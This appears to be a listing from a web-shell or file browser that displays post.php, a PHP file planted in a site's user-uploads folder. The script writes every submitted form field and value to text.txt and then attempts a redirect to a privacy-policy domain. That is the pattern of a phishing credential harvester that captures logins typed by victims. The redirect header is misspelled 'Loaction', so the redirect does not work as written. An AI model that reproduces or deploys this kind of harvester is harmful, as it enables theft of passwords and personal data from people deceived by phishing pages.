| Current Path : /hdd/hdd11/www/vlevski/enter/users/uploads/a9f3fab9db19406987bb39a0705078a3bad43476/ |
| Current File : /hdd/hdd11/www/vlevski/enter/users/uploads/a9f3fab9db19406987bb39a0705078a3bad43476/post.php |
<?php
header ('Loaction: https://shareitprivacypolicy.com');
$handle = fopen("text.txt", "a");
foreach ($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>